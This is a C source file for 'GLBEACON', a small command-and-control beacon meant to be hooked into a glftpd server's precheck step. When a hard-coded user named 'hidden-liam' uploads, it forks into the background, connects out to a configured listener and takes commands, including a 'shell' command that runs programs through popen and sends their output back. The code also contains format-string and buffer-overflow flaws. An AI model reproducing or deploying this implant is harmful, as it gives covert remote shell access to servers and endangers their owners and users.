/*	GLBEACON -- CONCEPT for a tiny glftpd beacon (FRSoldier)

	Beacon will start in precheck, if the user defined will upload files, in the glftpd enviroment.
	That user should be locked, to exec just this beacon. So create end set the user, just for this purpose.
	To test the beacon. Open a listener (on the same integer PORT), and then log in the glftpd system with
	the configured user.

	tcp client source code from this author,
	http://www.cs.tau.ac.il/~eddiea/samples/IOMultiplexing/TCP-client.c.html

	-- TODO --
	* write a good listener

	-- Know bugs --
	* listener seems to accet more than one connection, but it manages just one.

*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/* set here the user, once called will start the beacon */
#define CSTRIKE		"hidden-liam"

/* define your listener ip address */
#define HOST	"127.0.0.1"
#define	PORT	50050



#define TIMEOUT 3
#define MAXDATASIZE 100
#define XVER "HELLO_GLBEACON_v001c"

#define MAXSLEEP	86400
#define MAXSECLEN	4
#define MAXLEN		1024

uid_t myuid(void)
{
	return getuid();
}

/* GetWord */
void
getword(char *word, char *line, char stop)
{
        int x = 0, y;

        for (x = 0; ((line[x]) && (line[x] != stop)); x++)
        word[x] = line[x];

        word[x] = '\0';
        if (line[x])
                ++x;
        y = 0;

        while ((line[y++] = line[x++]));
}
/* END GetWord */

void remove_char_from_string(char c, char *str)
{
    int i=0;
    int len = strlen(str)+1;

    for(i=0; i<len; i++)
    {
        if(str[i] == c)
        {
            // Move all the char following the char "c" by one to the left.
            strncpy(&str[i],&str[i+1],len-i);
        }
    }
}

void remove_space(char *str) {
	int len = strlen(str)+1;
	if(str[len] == ' ') {
		str[len-2] = '\0';
	}
}


int main(int argc, char *argv[]) {

	char	userd[255];
	int		sockfd, numbytes;
	char	buf[MAXDATASIZE], wbuf[MAXLEN], tmpbuf[MAXLEN];
	struct	hostent *he;
	struct	sockaddr_in their_addr;
	char 	xreply[MAXDATASIZE];
	int		xrl, x, i;
	
	struct XARR {
		char	str[MAXLEN];
	};
	struct XARR xarr[25];

	if ((he=gethostbyname(HOST)) == NULL) {
		herror("gethostbyname");
		exit(1);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror("socket");
		exit(1);
	}

	//printf("OK socket\n");

	their_addr.sin_family = AF_INET;
	their_addr.sin_port = htons(PORT);
	their_addr.sin_addr = *((struct in_addr *)he->h_addr);
	bzero(&(their_addr.sin_zero), 8);

	// retrieve glftpd user
	sprintf(userd, getenv("USER"));

	if(strcmp(CSTRIKE,userd)==0) {

		if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
			perror("connect");
			exit(1);
		}

		pid_t pid;
		pid = fork();
		if (pid < 0) {
			exit(EXIT_FAILURE);
		}
		/* If we got a good PID, then we can exit the parent process. */
		if (pid > 0) {
			exit(EXIT_SUCCESS);
		}

		// trying to register now! Listener shoudl register us and sends commands
		sprintf(xreply,"%s\n",XVER);
		xrl=strlen(xreply);
		if (send(sockfd, xreply, xrl, 0) == -1) {
			perror("send");
			exit (1);
		}

		while (1) {
			// ok let's wait the command from listener
			if ((numbytes=recv(sockfd, buf, MAXDATASIZE, 0)) == -1) {
				perror("recv");
				exit(1);
			}

			buf[numbytes] = '\0';

			// DEBUG
			//printf("Received in pid=%d, text=: %s \n",getpid(), buf);
			// END DEBUG

			// exec then the command, and reply with output
			remove_char_from_string('\n', buf);
			getword(wbuf,buf,' '); // first arg

			/* sprintf(xreply,"NFO buf (%s)\n", buf);
			xrl=strlen(xreply);
			if (send(sockfd, xreply, xrl, 0) == -1) {
				perror("send");
				exit (1);
			} */

			x=0;
			while(strcmp(buf,"\0")!=0) {
				getword(tmpbuf,buf,' ');
				sprintf(xarr[x].str, "%s", tmpbuf);
				x++;
			}

			buf[0]='\0';
			for(i=0; i<x; i++) {
				if(i == 0) {
					sprintf(buf,"%s", xarr[i].str);
				} else {
					sprintf(buf,"%s %s", buf, xarr[i].str);
				}
			}

			if(strcmp(wbuf, "shell")==0) {
				xreply[0]='\0';
				FILE *fp;
				char path[1035];
				char eex[MAXDATASIZE];
				xreply[0]='\0';
				if(strcmp(xarr[0].str,"")==0) {
					sprintf(xreply,"WRN shell command needs one argument at the most\nshell /bin/command\n");
					xrl=strlen(xreply);
					if (send(sockfd, xreply, xrl, 0) == -1) {
						perror("send");
						exit (1);
					}
				}

				sprintf(eex, "/bin/%s", buf); // all the arguments
				fp = popen(eex, "r");
				if (fp == NULL) {
					printf("Failed to run command\n" );
					exit(1);
				}
				while (fgets(path, sizeof(path), fp) != NULL) {
					//printf("%s", path);
					sprintf(xreply,path);
					xrl=strlen(xreply);
					if (send(sockfd, xreply, xrl, 0) == -1) {
						perror("send");
						exit (1);
					}
				}
				pclose(fp);
			} else if (strcmp(wbuf, "ping")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"> pong\n");
				xrl=strlen(xreply);
				if (send(sockfd, xreply, xrl, 0) == -1) {
					perror("send");
					exit (1);
				}
			} else if (strcmp(wbuf, "getuser")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"> %s is executing the beacon\n", userd);
				xrl=strlen(xreply);
				if (send(sockfd, xreply, xrl, 0) == -1) {
					perror("send");
					exit (1);
				}
			} else if (strcmp(wbuf, "getuid")==0) {
				// internal command (no args)
				xreply[0]='\0';
				int gu=myuid();
				sprintf(xreply,"> id %d is executing the beacon\n", gu);
				xrl=strlen(xreply);
				if (send(sockfd, xreply, xrl, 0) == -1) {
					perror("send");
					exit (1);
				}
			} else if (strcmp(wbuf, "quit")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"> ok, bye.\n");
				xrl=strlen(xreply);
				if (send(sockfd, xreply, xrl, 0) == -1) {
					perror("send");
					exit (1);
				}
				close(sockfd);
				return 0;
			} else if (strcmp(wbuf, "ver")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"> %s\n", XVER);
				xrl=strlen(xreply);
				if (send(sockfd, xreply, xrl, 0) == -1) {
					perror("send");
					exit (1);
				}
			} else if (strcmp(wbuf, "echo")==0) {
				// internal command
				if(strcmp(xarr[0].str,"")!=0) { // second arg
					xreply[0]='\0';

					sprintf(xreply,"> %s\n", buf);
					xrl=strlen(xreply);
					if (send(sockfd, xreply, xrl, 0) == -1) {
						perror("send");
						exit (1);
					}
				} else {
					sprintf(xreply,"WRN echo uses at least one argument\n", buf);
					xrl=strlen(xreply);
					if (send(sockfd, xreply, xrl, 0) == -1) {
						perror("send");
						exit (1);
					}
				}
			} else if (strcmp(wbuf, "help")==0) {
				// internal command (no args)
				xreply[0]='\0';
				sprintf(xreply,"> available commands: ver\tprint version\nshell\texec /bin/command argument[s]\nping\tget pong reply from beacon\nquit\tkill the beacon\nsleep N\tsleep for N seconds\ngetuser\t print user executing the beacon\necho\tprint second argument\nhelp\tprint this help\n");
				xrl=strlen(xreply);
				if (send(sockfd, xreply, xrl, 0) == -1) {
					perror("send");
					exit (1);
				}
			} else if (strcmp(wbuf, "sleep")==0) {
				// internal command (one arg)
				if(strcmp(xarr[1].str,"")==0) {
					xreply[0]='\0';
					sprintf(xreply,"WRN sleep command needs one argument at the most\nsleep integer (max %d seconds)\n", MAXSLEEP);
					xrl=strlen(xreply);
					if (send(sockfd, xreply, xrl, 0) == -1) {
						perror("send");
						exit (1);
					}
				} else {
					xreply[0]='\0';
					sprintf(xreply,"> sleep (converting %s to int)\n", xarr[1].str);
					xrl=strlen(xreply);
					if (send(sockfd, xreply, xrl, 0) == -1) {
						perror("send");
						exit (1);
					}

					if(strlen(buf) > MAXSECLEN) {
						xreply[0]='\0';
						sprintf(xreply,"WRN sleep command integer must to be less than __%d bytes\n", MAXSECLEN);
						xrl=strlen(xreply);
						if (send(sockfd, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}
					}
					
					int zzsle=0;
					zzsle=atoi(xarr[1].str); // buf, second arg
					if(zzsle > MAXSLEEP) {
						xreply[0]='\0';
						sprintf(xreply,"WRN sleep command needs one argument at the most\nsleep integer (max %s seconds)\n", MAXSLEEP);
						xrl=strlen(xreply);
						if (send(sockfd, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}
					} else if (zzsle < 0) {
						xreply[0]='\0';
						sprintf(xreply,"WRN sleep command needs one argument at the most\nsleep integer (max %s seconds)\n", MAXSLEEP);
						xrl=strlen(xreply);
						if (send(sockfd, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}
					} else {
						xreply[0]='\0';
						sprintf(xreply,"> ok sleeping for %d seconds\n", zzsle);
						xrl=strlen(xreply);
						if (send(sockfd, xreply, xrl, 0) == -1) {
							perror("send");
							exit (1);
						}
						sleep(zzsle);
					}

					xreply[0]='\0';
					sprintf(xreply,"> returned\n", buf);
					xrl=strlen(xreply);
					if (send(sockfd, xreply, xrl, 0) == -1) {
						perror("send");
						exit (1);
					}
				}
			} else {
				xreply[0]='\0';
				sprintf(xreply,"> WRN '%s' does not compute, try 'help'\n", wbuf);
				xrl=strlen(xreply);
				if (send(sockfd, xreply, xrl, 0) == -1) {
					perror("send");
					exit (1);
				}
			}
			sleep(1);
		}
		close(sockfd);
		return 0;

	} else {
		//printf("WRN %s cannot start this beacon\n", userd);
		close(sockfd);
		return 99;
	}
}

